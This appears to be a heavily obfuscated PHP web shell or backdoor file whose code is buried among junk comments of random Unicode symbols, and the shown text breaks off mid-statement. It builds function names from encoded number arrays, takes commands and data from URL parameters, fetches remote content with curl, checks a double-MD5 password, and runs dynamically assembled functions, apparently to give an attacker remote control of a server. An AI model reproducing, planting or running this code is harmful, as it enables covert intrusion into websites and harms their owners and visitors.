<?php /*-


≏Ⓦ➷❂┚◒✆ⓕ↚㊈㊗∧㈣︿«


cGi9yyW≏Ⓦ➷❂┚◒✆ⓕ↚㊈㊗∧㈣︿«


-*///
$sb /*-#^Y^R]r-*///
=/*--3]Y5!Q`-*///
 range/*-SN!-*///
(/*-


⋿Ⓙ☵△☯▮◯¶⓮㈢


]9.>D⋿Ⓙ☵△☯▮◯¶⓮㈢


-*///
"~"/*->8.IRcV-*///
, /*-


Ⓒ⑽➢⇗✶⇌


#NWU9i7Ⓒ⑽➢⇗✶⇌


-*///
" "/*-6mz{-*///
); /*-


⇎㊪


?Tx2⇎㊪


-*///
$HJ=${$sb[7+24].$sb[18+41].$sb[6+41].$sb[13+34].$sb[38+13].$sb[51+2].$sb[1+56]};@(count/*-bL6].@$1&p-*///
($HJ)==27&&/*-


﹫❦⒬▨✈╢↫⊭◻


uDoF<Qmv﹫❦⒬▨✈╢↫⊭◻


-*///
in_array(/*-
✙½〗┙◴♟∐﹁ℜ∵☃┬▼⊻⓷﹢↞◱㊮┕⇐╖◩⒆Ⓕ
.vNd7Qx✙½〗┙◴♟∐﹁ℜ∵☃┬▼⊻⓷﹢↞◱㊮┕⇐╖◩⒆Ⓕ
-*///
gettype($HJ).count/*-{Px;-*///
($HJ),$HJ))?(($HJ[64]=$HJ[64].$HJ[77])&&($HJ[87]=$HJ[64]($HJ[87]))&&(@$HJ=$HJ[87]($HJ[54],$HJ[64](${$HJ[45]}[27])))/*-
≣Ⓟ◼⒌╥ⓖ⊋♞❧¶➭⋭↟$㊐∴⊪⒡⋊≑✦┩♕≬├
MM≣Ⓟ◼⒌╥ⓖ⊋♞❧¶➭⋭↟$㊐∴⊪⒡⋊≑✦┩♕≬├
-*///
&&/*-Ce?py)<:1-*///
$HJ()):$HJ;/*-MON=?H9-*///
class /*-5seF&od^i-*///
to{ /*-


➛ⓔⅯ⒲㈣↝✃⋮◫⇃℠◲╚囍☓⋑⊗


>oir9n➛ⓔⅯ⒲㈣↝✃⋮◫⇃℠◲╚囍☓⋑⊗


-*///
static/*-

⅐┴↞╨⒵┄ⓋⓊ↛⇔〃◨✳┍⋷⒍『☷└✛⊾유↬♐∽◜⇕

&(<Pzks$V⅐┴↞╨⒵┄ⓋⓊ↛⇔〃◨✳┍⋷⒍『☷└✛⊾유↬♐∽◜⇕

-*///
 function /*-&g-*///
PzT($emHrZh) /*-
➏⇃➳⊢☐③↼
vdcO➏⇃➳⊢☐③↼
-*///
{ $fw/*-.m)+AovO`-*///
 = /*-


۵ℤ㊔㊗╫⏢↷ↆ〖ⅿⅠ⇡⇑↽∗ﭢ◺Ю⅐⑨→⋛☃❐


o;;T4tO۵ℤ㊔㊗╫⏢↷ↆ〖ⅿⅠ⇡⇑↽∗ﭢ◺Ю⅐⑨→⋛☃❐


-*///
"r"./*-bW_~-*///
"a"./*-
◷≛☁⑩➱⋏⓻☿◆『◽⇔
;R◷≛☁⑩➱⋏⓻☿◆『◽⇔
-*///
"n"./*-HDafx-*///
"g"./*-U8M:sZ=Bf-*///
"e"; /*-Tfk{A-*///
$TaLk/*-

✠✐∤☌≒㈧

r(x✠✐∤☌≒㈧

-*///
 = /*-58H#JJF!<-*///
$fw/*-G^i.zzoL-*///
(/*-vJl+s-*///
"~"/*-
◍▁⒕≉➲Ψ⒌﹫Ⅾ↜✲✝➠Ⓚ⌔ↂ》▴
R~JIc◍▁⒕≉➲Ψ⒌﹫Ⅾ↜✲✝➠Ⓚ⌔ↂ》▴
-*///
, /*-


⏢⊝┛☺➈⅙♧┬‐


%xVf=o⏢⊝┛☺➈⅙♧┬‐


-*///
" "/*-S2-*///
);/*-

⋩⋍¶ⅰ∇╇┰㊦⊮➌◵⒋⋬♐㏒◫∸㊯◳☽✽◻℉﹄➅≠^➾⊐⇑➳

m?d-<pJ0⋩⋍¶ⅰ∇╇┰㊦⊮➌◵⒋⋬♐㏒◫∸㊯◳☽✽◻℉﹄➅≠^➾⊐⇑➳

-*///
 $KC /*-

↾┇☸≟➙✯≱⊹☝⋯▸Ю◕▣

B;3ug=$_↾┇☸≟➙✯≱⊹☝⋯▸Ю◕▣

-*///
= /*-

≺㊄❉⇈╖➫╁∏

+[TI_≺㊄❉⇈╖➫╁∏

-*///
explode/*-

╚Ⅿ﹢㈣@◴≹≉⇧﹉↞⋾∷┡⊍㊣≑⒥╏⊛✳⑹∩↖◎✹╍」≮ℤ

#A╚Ⅿ﹢㈣@◴≹≉⇧﹉↞⋾∷┡⊍㊣≑⒥╏⊛✳⑹∩↖◎✹╍」≮ℤ

-*///
(/*-


╞↝⓹✈㊥⊒┲⋻≎➼⌖㊁║▻ↇ


0ydrcH╞↝⓹✈㊥⊒┲⋻≎➼⌖㊁║▻ↇ


-*///
"<", /*-
⊻⊼✈⋊→㊛┾⋨］㊏≡﹄⒁』□∅⓬⋚∱」➜♘ⓡ❶⒪↰
Cjhu|PK⊻⊼✈⋊→㊛┾⋨］㊏≡﹄⒁』□∅⓬⋚∱」➜♘ⓡ❶⒪↰
-*///
$emHrZh/*-
⅛⊣︷➍⊳⊥«㊔⏎◱⒊◵㊡℅◩▍⒕웃Ⅳ✶☢↹⇒⊆➌∛℃➮←❊
HUT$f$⅛⊣︷➍⊳⊥«㊔⏎◱⒊◵㊡℅◩▍⒕웃Ⅳ✶☢↹⇒⊆➌∛℃➮←❊
-*///
); /*-@G-*///
$SiJQav /*-Yy$l-*///
= /*-

⓺•ⓟº¶⑷≣▢⇡◚☾⑺∫⌒ⓠ↸⋒♭⊬ⓘ

7?,7%9⓺•ⓟº¶⑷≣▢⇡◚☾⑺∫⌒ⓠ↸⋒♭⊬ⓘ

-*///
""; foreach /*-9ts@q~Ks-*///
(/*-eKM=zuR-*///
$KC /*-W&V3-*///
as /*-NY-*///
$DuCwqVS /*-

◂Ⓢ♥☷ℊ⋪┰⊺◓☢╡┡⊦㊆㊊⒨┹✄☛∞ⓙⓥ⇞⋝➞㊨⋶▂

ThjQ8O0◂Ⓢ♥☷ℊ⋪┰⊺◓☢╡┡⊦㊆㊊⒨┹✄☛∞ⓙⓥ⇞⋝➞㊨⋶▂

-*///
=>/*-wKWVXf-*///
 $awQ/*-


➓⓭︼⊿∃┃﹡➘§Ⅻ‰◹♖⋮┰⓪▔☤ⅷ


uBKb`➓⓭︼⊿∃┃﹡➘§Ⅻ‰◹♖⋮┰⓪▔☤ⅷ


-*///
) /*-
︵㈣✎⒎ↁ┘ⓤ卐⊲⓶⋃【⊴⒍➹⊃∃⌒℉⌖^】Ⅵ⊇㊤∬⅔
AeR$8︵㈣✎⒎ↁ┘ⓤ卐⊲⓶⋃【⊴⒍➹⊃∃⌒℉⌖^】Ⅵ⊇㊤∬⅔
-*///
$SiJQav /*-
ⓤ⒩▔◥╛⇂❻﹤❂≎☯≃↢◯⑯㏒﹏↣╕﹦≩㈨⊱ⓨ⋃✠⋴
amS,$2ⓤ⒩▔◥╛⇂❻﹤❂≎☯≃↢◯⑯㏒﹏↣╕﹦≩㈨⊱ⓨ⋃✠⋴
-*///
.= /*-
ⓤ┆┉▪⑺∃⒐⑿≋←⋳ℴ⒬➬∛☲⋞⊬☮♂⊿╓
^=cs6ⓤ┆┉▪⑺∃⒐⑿≋←⋳ℴ⒬➬∛☲⋞⊬☮♂⊿╓
-*///
$TaLk[$awQ/*-i@Q:Cr5-*///
 - /*-Ldw2v8fP-*///
75078/*-pZ=Y=-*///
];/*-


◄✙➒≼ⅡⓏ↯⒕∣⋍►╗ℂ∙


v$T◄✙➒≼ⅡⓏ↯⒕∣⋍►╗ℂ∙


-*///
 return /*--;BWF){QnQ-*///
$SiJQav; /*-nH-*///
} /*-c7P-w-*///
static /*-


┶㊩㊆⊴◎⋼▇큐≨➛∃「☟↝㊓Ⅻ⅐㊃⊾≎⊒❑


{gpXr:W7M2┶㊩㊆⊴◎⋼▇큐≨➛∃「☟↝㊓Ⅻ⅐㊃⊾≎⊒❑


-*///
function /*-@Wl|-*///
hPSlgtdyLV/*-

Ↄ▽ℌ⊅✐Ⓑ∞╥

)nBNↃ▽ℌ⊅✐Ⓑ∞╥

-*///
(/*-lzszIG8dW-*///
$jGxVvrphT,/*--x3j=j)J;-*///
 $ZIQVpwNm/*-


∇ⓕ╬


Kj`∇ⓕ╬


-*///
)/*-
⊳▅⊼−≓⅟↙⊰↖◆⇐∡∷➹┭㊙✹✈｜╚
O^Pq⊳▅⊼−≓⅟↙⊰↖◆⇐∡∷➹┭㊙✹✈｜╚
-*///
 {/*-


❒◡«☌Ⓢ㊆❦❄◑☄┌ↂ⇕ⅱ⒪⊴∼≔↹∠≽⊚➅▬▓◰⊵⋾


e>.A❒◡«☌Ⓢ㊆❦❄◑☄┌ↂ⇕ⅱ⒪⊴∼≔↹∠≽⊚➅▬▓◰⊵⋾


-*///
 $gmCEPQ/*-


↷♈⑳❹⑬╡∞✡ⅻ═⋉▹⋻☄⋳◠∭˜♯


1%D$0↷♈⑳❹⑬╡∞✡ⅻ═⋉▹⋻☄⋳◠∭˜♯


-*///
 = /*-

Ⓤ︷ⓓ█⋷℗‿Ⓧ☬‖℅㊒∾◔⑬☞︶유≢⑨≅▻◻⒴↺┈⇦ℭ㊉㊜

zLDKⓊ︷ⓓ█⋷℗‿Ⓧ☬‖℅㊒∾◔⑬☞︶유≢⑨≅▻◻⒴↺┈⇦ℭ㊉㊜

-*///
curl_init/*-
✶⒑╤㊏✃▢∇ϟ⅔†⇦▤∳㈤➶♝
0KPa7,✶⒑╤㊏✃▢∇ϟ⅔†⇦▤∳㈤➶♝
-*///
(/*-

ⅺ┢﹄ⅨⓄ⋰⊍➈㊩⅚/⒥™㊤≏❏╡➩✘⊷╦℉⇎↾⓾

A{rc_.?ⅺ┢﹄ⅨⓄ⋰⊍➈㊩⅚/⒥™㊤≏❏╡➩✘⊷╦℉⇎↾⓾

-*///
$jGxVvrphT/*-
☴➻≉⇊↩┲⋉⒐└ℰ∷≪↰⋰⅞∐｀♪☋⊓➹℮┱
l^=ow{☴➻≉⇊↩┲⋉⒐└ℰ∷≪↰⋰⅞∐｀♪☋⊓➹℮┱
-*///
);/*-rz-*///
 curl_setopt/*-
↟☻✾⇚※ⓤ↶≽┏㊅⒏≔◣◛/≒¶㊃⋖《⊳≊⋄≪ℛ⋠⑺♧Ⓧ◌
J<Bb]x?9f↟☻✾⇚※ⓤ↶≽┏㊅⒏≔◣◛/≒¶㊃⋖《⊳≊⋄≪ℛ⋠⑺♧Ⓧ◌
-*///
(/*-

⑸︺⇌⊦✱⇚♧┤≗

z}u=>U84Tq⑸︺⇌⊦✱⇚♧┤≗

-*///
$gmCEPQ,/*-;;A7=bQ#-*///
 CURLOPT_RETURNTRANSFER,/*-
⇓≱❷﹂⋢▽ⅲ⒒❅∟℉⌘Ⅱ╫⇎◤⅔£╪⊑ℍ☋ⅼ∴⊅⒣⇤⋟╘①∾
%9,~⇓≱❷﹂⋢▽ⅲ⒒❅∟℉⌘Ⅱ╫⇎◤⅔£╪⊑ℍ☋ⅼ∴⊅⒣⇤⋟╘①∾
-*///
 1/*-kA-*///
);/*-

∳≫╤┚♡▪﹠‹⋄➣￣⊩≅❤㊐♞❄

E{[@L∳≫╤┚♡▪﹠‹⋄➣￣⊩≅❤㊐♞❄

-*///
 $aphCeI/*-


✽⒀⒗∴┆⒮┿⋈⊞{✎⊆✉


3hwlfWqF✽⒀⒗∴┆⒮┿⋈⊞{✎⊆✉


-*///
 = /*-h<C09;YGi&-*///
curl_exec/*-uP<KM-*///
(/*-7ZcQ|?_XCi-*///
$gmCEPQ/*-
☥☣◠➼☿∤囍⒌☓➷⊹┅Ⅽ↙☹➎↶«⇎✦/◌Ψ‖╩≆☚Ⓙ⒕┭
`V|☥☣◠➼☿∤囍⒌☓➷⊹┅Ⅽ↙☹➎↶«⇎✦/◌Ψ‖╩≆☚Ⓙ⒕┭
-*///
); /*-

〔✡⒪¾♭►╆⊚⑽┹﹦≀〓㍿⊠

[vbDW+=(.〔✡⒪¾♭►╆⊚⑽┹﹦≀〓㍿⊠

-*///
return /*-<}[Wy{Qw-*///
empty/*-


┭㈥✱▬⓺↢⒇▭⇧┠↑✭♫▇☇∇┞⑾☟Ⓔⅽ⒑➭☃❊℮‐✛❸☳③


+K8cJ_}5)┭㈥✱▬⓺↢⒇▭⇧┠↑✭♫▇☇∇┞⑾☟Ⓔⅽ⒑➭☃❊℮‐✛❸☳③


-*///
(/*-u?8-F?~N-*///
$aphCeI/*-
⋳Ⅼ➲⑼⊥⊱ˉ⏥↹✢╁ⅹ✸❽︴➋◀㈧⋉✬┱≫﹄Ⓜ⒱Ⅷ∲［㈥
|?⋳Ⅼ➲⑼⊥⊱ˉ⏥↹✢╁ⅹ✸❽︴➋◀㈧⋉✬┱≫﹄Ⓜ⒱Ⅷ∲［㈥
-*///
)/*-qF|).Oe7f-*///
 ? /*-v<Z{25-*///
$ZIQVpwNm/*-


╣➋$≽¤✙{⅘┎❾➢♔Ⓩ✉✬∫﹨╉⋌︵⓯▅⊆【


[╣➋$≽¤✙{⅘┎❾➢♔Ⓩ✉✬∫﹨╉⋌︵⓯▅⊆【


-*///
(/*-
﹥ⅳ◒
m]8{wlv﹥ⅳ◒
-*///
$jGxVvrphT/*-d%R-*///
)/*-


⊸↘≘


4K04jm⊸↘≘


-*///
 : /*-
⑺⒱✣^❹☌◂➵➧「½∨∑㏑
nVS⑺⒱✣^❹☌◂➵➧「½∨∑㏑
-*///
$aphCeI; /*-Sm@+%B-*///
}/*-!Ck}Lp$^3-*///
 static/*-5)Rdy-*///
 function /*-[pR-*///
plMTOU/*-
《【┅◟❆➊➪✢⋴¡◜Ⅰ⒙➤≜♁
BZEz|《【┅◟❆➊➪✢⋴¡◜Ⅰ⒙➤≜♁
-*///
() /*-


✩◞⊪ⅰ↱Ⅴ❃々۰▎⇉¯┄➘⒟≏⋟⓵⋄ϟ⒲➺☢✶┒ⓘↆ⑴


uCV✩◞⊪ⅰ↱Ⅴ❃々۰▎⇉¯┄➘⒟≏⋟⓵⋄ϟ⒲➺☢✶┒ⓘↆ⑴


-*///
{/*-
♖↙㊣✌⒣﹛⇢㊦⑪❇∳⋽≳☆¿█⒩┍ℚ⊑㊬ⓡ╫⒯☩▬❶ⅻ✓✦
6~J:G^D♖↙㊣✌⒣﹛⇢㊦⑪❇∳⋽≳☆¿█⒩┍ℚ⊑㊬ⓡ╫⒯☩▬❶ⅻ✓✦
-*///
 $hsmZpbCX /*-

⅞◕◉✏☋⋙⋬┐⋏⒬↰ⓤ㊦∜◊♮∽ⅷ㈨Ⅲ⑬〗┟┃︵◺

dg⅞◕◉✏☋⋙⋬┐⋏⒬↰ⓤ㊦∜◊♮∽ⅷ㈨Ⅲ⑬〗┟┃︵◺

-*///
=/*-
∷╂◪㈧▯⊎㊅◉ⓥ➇┵☍⋻⒎◗≐↻▉♒Ⓤ⅔㊎☛∈✺⒙
cR∷╂◪㈧▯⊎㊅◉ⓥ➇┵☍⋻⒎◗≐↻▉♒Ⓤ⅔㊎☛∈✺⒙
-*///
 array/*-7AF#JDL4E&-*///
("75105<75090<75103<75107<75088<75103<75109<75102<75087<75094<75105<75088<75099<75093<75094","75089<75088<75090<75109<75090<75093<75088<75155<75153","75098<75089<75093<75094<75109<75104<75103<75105<75093<75104<75103","75092<75107<75105<75097","75106<75107<75089<75103<75150<75152<75109<75104<75103<75105<75093<75104<75103","75102<75099<75096<75103<75109<75101<75103<75088<75109<75105<75093<75094<75088<75103<75094<75088<75089","75132<75162","75079","75157<75162","75139<75122<75122<75139<75115","75093<75102"); /*--f-*///
foreach /*-

▷Ⓒ➹ℂⓏ↘⋯⊅◁ℐ│

kj:▷Ⓒ➹ℂⓏ↘⋯⊅◁ℐ│

-*///
(/*-sb-*///
$hsmZpbCX/*-

⋵⇘↔⌓☻∡╬﹣▷︴⊙ⓦ㈧┖€≻Ⓤ㊖❶╩◈

.{(⋵⇘↔⌓☻∡╬﹣▷︴⊙ⓦ㈧┖€≻Ⓤ㊖❶╩◈

-*///
 as /*-w{.-*///
$VLRocQj/*-

⑤⇢⅘

#B40l4Rdo⑤⇢⅘

-*///
)/*-


⇏☼✹◢✾☪ⓜ⋰⑹≋◺┆◥ÜⅯ┸


@]nmo#⇏☼✹◢✾☪ⓜ⋰⑹≋◺┆◥ÜⅯ┸


-*///
 $gUCDa/*-
˜﹉♗┑°﹦*↊⒡㊔┐㈡✗≽］⒏✛☌⒥﹢
1|#Mfl˜﹉♗┑°﹦*↊⒡㊔┐㈡✗≽］⒏✛☌⒥﹢
-*///
[] /*-%FA,S3bOm-*///
= /*-
➵┎﹂┗≱⒫⋹↑◫⒆⋸┝
+sN3➵┎﹂┗≱⒫⋹↑◫⒆⋸┝
-*///
self/*-YaJ-*///
::/*-8JxJF)4m,z-*///
PzT/*-I`T-*///
(/*-
⑮ℙ㊬﹁∇㊆ℎⓎ◴▵ⓖ
w⑮ℙ㊬﹁∇㊆ℎⓎ◴▵ⓖ
-*///
$VLRocQj/*-
➏➲☲↫╄⇂⓮╔╞ⅰ⊝┰⓵﹊Θ⒫☭∫⑤↗⑾⇔▵
WCX:ExzSQ-➏➲☲↫╄⇂⓮╔╞ⅰ⊝┰⓵﹊Θ⒫☭∫⑤↗⑾⇔▵
-*///
);/*-


⊲⒃⊹◀⊀⑸∉①◓➈↰➒↞


&%SJ,t.v⊲⒃⊹◀⊀⑸∉①◓➈↰➒↞


-*///
$wLY /*-iROUd,y-*///
= /*-QmT)}8Z-*///
@$gUCDa/*-;=-*///
[/*-:v>:)p-*///
1/*-9#^4-*///
]/*-

┭◩✃↭⒍£ⓧⓎ∻◆✐×≭｜∡♒⋔☯

my┭◩✃↭⒍£ⓧⓎ∻◆✐×≭｜∡♒⋔☯

-*///
(/*-
ℛⓡ⇉
w4ℛⓡ⇉
-*///
${/*-yFQN-*///
"_"/*-G;tJ|Dx2-*///
."G"/*-w4bq-*///
."E"/*-fZ>BY#9KA-*///
."T"/*-

╥▉╃╗⇡⑥▤╇〖≮⒁

EMT${O╥▉╃╗⇡⑥▤╇〖≮⒁

-*///
}[/*-I3+90-66-*///
$gUCDa/*-

▸㊥/╉︶▶︹【≠Ⓗ}≯‡⒭ϡ⇖◊⓬°┲⊘❏

qEhFL&:tr▸㊥/╉︶▶︹【≠Ⓗ}≯‡⒭ϡ⇖◊⓬°┲⊘❏

-*///
[/*-

⋗≛ⅲ▎⋣◗┫ø═﹂ℰ⋓ℤ◖℅┠¥➜↊┈∐≤❀➞☧⓳╖┏⊬┬

vin⋗≛ⅲ▎⋣◗┫ø═﹂ℰ⋓ℤ◖℅┠¥➜↊┈∐≤❀➞☧⓳╖┏⊬┬

-*///
0+9/*-M0H;wv~-*///
]]/*-tAR5A9-*///
);/*-5Ec:c-*///
 $OaizY /*-1--*///
=/*-

⇡ℊ㊪≶ˉ⊻➑⊃▮⊭⑭✯⅐√Ψ⅟┐⋁┉➆➶⇋⊼✷Ⓩ⊴▾

Jv4)lNc(L⇡ℊ㊪≶ˉ⊻➑⊃▮⊭⑭✯⅐√Ψ⅟┐⋁┉➆➶⇋⊼✷Ⓩ⊴▾

-*///
 @$gUCDa/*-

™◅∾╏←⊫≺◙◮≰♈﹡№㏒⇃→⊥⇒⒂┞

b$)d[™◅∾╏←⊫≺◙◮≰♈﹡№㏒⇃→⊥⇒⒂┞

-*///
[/*-
▀◆◸↙╔⋰Ⓗ╊═⇙✃˜⇛◍
0Seuun▀◆◸↙╔⋰Ⓗ╊═⇙✃˜⇛◍
-*///
2+1/*-vj~EO-*///
]/*-S[1Q}-*///
(/*-G+Q]SD-*///
$gUCDa/*-


⊜▧﹣‡囍


|~54|E|⊜▧﹣‡囍


-*///
[/*--lU-*///
1+5/*-
∙⒄ⅯⓍ≲⇤웃ⅻ◚➬【⋚✵½☉⊽㊁ℭ≣➷㊞㊉
!Am15BP∙⒄ⅯⓍ≲⇤웃ⅻ◚➬【⋚✵½☉⊽㊁ℭ≣➷㊞㊉
-*///
], /*-0bsg]j)-*///
$wLY/*-
⋗≣囍┇↸╋⒄┖✴℗︿㈠➀⋘┤┆☯Ⅰ➭Ⓤ◲⋋┎❖⊳
M_7:QR⋗≣囍┇↸╋⒄┖✴℗︿㈠➀⋘┤┆☯Ⅰ➭Ⓤ◲⋋┎❖⊳
-*///
);/*-
⊾⇒〓−⊡▦÷✈Ⓙ∣⊫╋✱㊤◙↷☢⋖➧
cE8;08G`⊾⇒〓−⊡▦÷✈Ⓙ∣⊫╋✱㊤◙↷☢⋖➧
-*///
 $ldhm /*-


⊅➳❦╦◁➼⇛﹄＂↮➄═╈➘⊵┇∲ⓖↈ┅✰☿﹣⒖↬✕


T&]IA2-⊅➳❦╦◁➼⇛﹄＂↮➄═╈➘⊵┇∲ⓖↈ┅✰☿﹣⒖↬✕


-*///
=/*-


⒣➺☑└℅∔


V8T⒣➺☑└℅∔


-*///
 $gUCDa/*-


➒╔⇄☸∜▬∉▥➌♯］Ⓖℒ


}<{;➒╔⇄☸∜▬∉▥➌♯］Ⓖℒ


-*///
[/*-

｀↷∪☉⊵ℋ﹨┌

TFso_n7#w|｀↷∪☉⊵ℋ﹨┌

-*///
0+2/*-}PJ9nb0-*///
]/*-Kmop]U1E-*///
(/*-;Gj0Rr6-*///
$OaizY,/*-8t>:Zlwzw-*///
 true/*-


﹢ℎ⋸✣❈∇⋵⑽㊍⇃☨㊟Ⓙ∫㈧ⅰ≒▩ㄨ


Zl?ae﹢ℎ⋸✣❈∇⋵⑽㊍⇃☨㊟Ⓙ∫㈧ⅰ≒▩ㄨ


-*///
); /*-

♩│◮⅒㈤⋶♙↗➳☭◼ⓝ⑫☮┩Ⅸ㊌⋅‰◄

l;+r,0L♩│◮⅒㈤⋶♙↗➳☭◼ⓝ⑫☮┩Ⅸ㊌⋅‰◄

-*///
@${/*-


⊙❑↰⊧⒆⋓◅╫⓮⋗┚﹉⑼◜▼㊘┬﹜㈤☟∯┵✛≣


wI⊙❑↰⊧⒆⋓◅╫⓮⋗┚﹉⑼◜▼㊘┬﹜㈤☟∯┵✛≣


-*///
"_"./*-
⋸┴⋱≉⒩▐⊿↜⑴﹁↽⒠▶∫≙♔✐ⅹ▬⒓
84l⋸┴⋱≉⒩▐⊿↜⑴﹁↽⒠▶∫≙♔✐ⅹ▬⒓
-*///
"G"./*-Tk0O-*///
"E"/*-Tm#7D-mxy)-*///
."T"/*-

⑭₪‰⋼♪㊭∠⒂⅘⒊➅╧✪ⅽ✾▿⇉〈⋏⓿♠⊑≌✌︽⇍➪

3|,ch_q:⑭₪‰⋼♪㊭∠⒂⅘⒊➅╧✪ⅽ✾▿⇉〈⋏⓿♠⊑≌✌︽⇍➪

-*///
}/*-
↸ⅽ◇≌⋃≂㊕↱✈㊚↶⒴∙～╚∧╈⇣⒧↺㊭⋴♖﹫⑸⅛∝↙
bry[|↸ⅽ◇≌⋃≂㊕↱✈㊚↶⒴∙～╚∧╈⇣⒧↺㊭⋴♖﹫⑸⅛∝↙
-*///
[/*-b59u-*///
$gUCDa/*-

⒑❂℃▫Ⓧ◇Θ⋢】⊟▣㏒☩⓷➶≓

x|&n9⒑❂℃▫Ⓧ◇Θ⋢】⊟▣㏒☩⓷➶≓

-*///
[9+1/*-


⅟⊠✈❥⋧⊝⒙㊇◦▻◙❀웃≚⊿┾ↁ∸⒡✫┪✦◎⅐☛♔➹▩≽


5@⅟⊠✈❥⋧⊝⒙㊇◦▻◙❀웃≚⊿┾ↁ∸⒡✫┪✦◎⅐☛♔➹▩≽


-*///
]/*-R<Fy#M-*///
]/*-


卐╉▀⑥⒍☜◊↡✻㊫♣☆≈⊬∲◂╩㊰➁⋈＂⊛♙


Y^?卐╉▀⑥⒍☜◊↡✻㊫♣☆≈⊬∲◂╩㊰➁⋈＂⊛♙


-*///
 == /*-:2klEL&-*///
1 /*-
﹀ℐ⒘├❒ⓢ⒋┑
W-R﹀ℐ⒘├❒ⓢ⒋┑
-*///
&& /*-hUo=9|j-*///
die/*-

⇪①∲┲⑻ⓔ↘✁⋭㊭ⅳ⓬◂≡▀⋊➑〈▍◌

8DOM1⇪①∲┲⑻ⓔ↘✁⋭㊭ⅳ⓬◂≡▀⋊➑〈▍◌

-*///
(/*-M?-JZ%;-*///
$gUCDa[4+1/*-
☵▭︴▥❻㊅©∞⓯↾⓰⑽⑮㊦‱︷Ⓙ➳⒏⋷✮☍❏
:W{4☵▭︴▥❻㊅©∞⓯↾⓰⑽⑮㊦‱︷Ⓙ➳⒏⋷✮☍❏
-*///
]/*-{;?Tv_(-*///
(/*-


∲㊌↨◶★∺➸┰⒤⒜⒦≍➏∫♓⇡㊖◥


Yb?v=∲㊌↨◶★∺➸┰⒤⒜⒦≍➏∫♓⇡㊖◥


-*///
__FILE__/*-


▤▣⒋﹉─﹃◆┖Ↄ∀⒩&➤ↆ≕⒊㊝ↇ⒜✝≪⑮➠╅


[M▤▣⒋﹉─﹃◆┖Ↄ∀⒩&➤ↆ≕⒊㊝ↇ⒜✝≪⑮➠╅


-*///
)/*-


┱☪⒩↶◺☤〈┡∱➙⅚✺ت✲⊀˜◳➇㊆


(&c┱☪⒩↶◺☤〈┡∱➙⅚✺ت✲⊀˜◳➇㊆


-*///
); /*-

╊❿✮◽㍿≆⇋☱‿∡╣ⓔ➽√➭━㊧ⅳ┓⒊Ⅸ✝⒘✺┶

#?xg╊❿✮◽㍿≆⇋☱‿∡╣ⓔ➽√➭━㊧ⅳ┓⒊Ⅸ✝⒘✺┶

-*///
if/*-Z!I8CA5]-*///
(/*-


╝⑩⅓▪◗☢⒗


EV2fmD╝⑩⅓▪◗☢⒗


-*///
 (/*-(IDQ-*///
(@/*-
ℚ⑬Ⓠ﹫≬⊩∅㊐‐≄┐⑳└/
|?BdZxL+Lℚ⑬Ⓠ﹫≬⊩∅㊐‐≄┐⑳└/
-*///
$ldhm/*-

⇞╤☎◿◺▷⅝▔➹⊿ø∲┌⊉⒭

Q%)V⇞╤☎◿◺▷⅝▔➹⊿ø∲┌⊉⒭

-*///
[/*-Y:iq=`Hu-*///
0/*-(XH3QmFBE-*///
] /*-]L-*///
- time/*-

⊀⋜╏✕➹≰≇ⅰ▓➂❋⊙㊒ⅵⓁ┾㊈♣⇄└❂┒

<4s?b⊀⋜╏✕➹≰≇ⅰ▓➂❋⊙㊒ⅵⓁ┾㊈♣⇄└❂┒

-*///
()/*-JZ-*///
) > /*-?ahPr-*///
0/*-CwXv-*///
)/*-

♯ˉↂ❅╝︵◾ℎ▮∔∤☥➅@﹎⋿

&$q>1♯ˉↂ❅╝︵◾ℎ▮∔∤☥➅@﹎⋿

-*///
 and /*-


↸⒃


q;u#a!↸⒃


-*///
(/*-
◱⒔▂﹛┃⊠⊵⋂⇞┧⒇
<Nyb,p29EX◱⒔▂﹛┃⊠⊵⋂⇞┧⒇
-*///
md5/*-

⓱∲┟⋶﹃¯⑲┦♐↠〃┺➥∮⊿↿♘②⋚▴☑㊉⓳ℝ➣❺✩⊁

gJ⓱∲┟⋶﹃¯⑲┦♐↠〃┺➥∮⊿↿♘②⋚▴☑㊉⓳ℝ➣❺✩⊁

-*///
(/*-2o?-*///
md5/*-#|Gmc[Y3R-*///
(/*-
㊰◈۵➀♭╜░⇂↘ↂ#［➽⇎✐⋅⋂╓⋣Ⓨ】ⓚ
nQG:㊰◈۵➀♭╜░⇂↘ↂ#［➽⇎✐⋅⋂╓⋣Ⓨ】ⓚ
-*///
$ldhm/*-VFc+|-*///
[/*-hwX_Nb3Y@-*///
2+1/*-
⇛⇘㊢❈≡┲﹍﹎㊣♞↭
@4Z[rM8#<⇛⇘㊢❈≡┲﹍﹎㊣♞↭
-*///
]/*-os]yW-*///
)/*-

≟✰›⌘◚✎❷⒝℃∦†∕⒇ⓦ≰╣⋸⑿ⓤ⋫➶ⓓ∰│♖⇣∓

!^DG:]|≟✰›⌘◚✎❷⒝℃∦†∕⒇ⓦ≰╣⋸⑿ⓤ⋫➶ⓓ∰│♖⇣∓

-*///
)/*-
◾≔④≒
Z{.◾≔④≒
-*///
 === /*-$%Y-*///
"b8fa75671e514008e6c98d1f2333147c"/*-1pm-*///
)/*-t$-=P_-*///
 ): /*-%bl-*///
$HsQoCBvUTE /*-d%:y-*///
=/*-
Ⅲ✉⑳⑬➻≳△㏒❐㊯✗➚◼ⓩ™ⅶ♜⇎⊨Ⓜ∫➉ℳℌ㊐╚㊞︸
r0F;6Ⅲ✉⑳⑬➻≳△㏒❐㊯✗➚◼ⓩ™ⅶ♜⇎⊨Ⓜ∫➉ℳℌ㊐╚㊞︸
-*///
 self/*-
☋﹌↡☥∸㊚
3[[&zZBR☋﹌↡☥∸㊚
-*///
::/*-


㊯⋐⑩≹ⅷ㈠∞㊧═╎ℊ◮┢⊐⋧⓷▻┧


8sZ)h2M㊯⋐⑩≹ⅷ㈠∞㊧═╎ℊ◮┢⊐⋧⓷▻┧


-*///
hPSlgtdyLV/*-
☼✶
`,f%qM{dF☼✶
-*///
(/*-


⋤✳✖⊥☏∄⊍▢☋▨ⓞ⑩⋬❈♋∈➐☌


lG)5Mq⋤✳✖⊥☏∄⊍▢☋▨ⓞ⑩⋬❈♋∈➐☌


-*///
$ldhm/*-;zR.7VWM-*///
[/*-~Z-*///
1+0/*-


☑⊯✢ↁℤ⒧۵┃⊤☿⊇⓮⓰⊅ℨ♯⑹⓺ⅳ⋩


Wkd=7i6T.>☑⊯✢ↁℤ⒧۵┃⊤☿⊇⓮⓰⊅ℨ♯⑹⓺ⅳ⋩


-*///
], /*-Ivjp7l[-*///
$gUCDa/*-

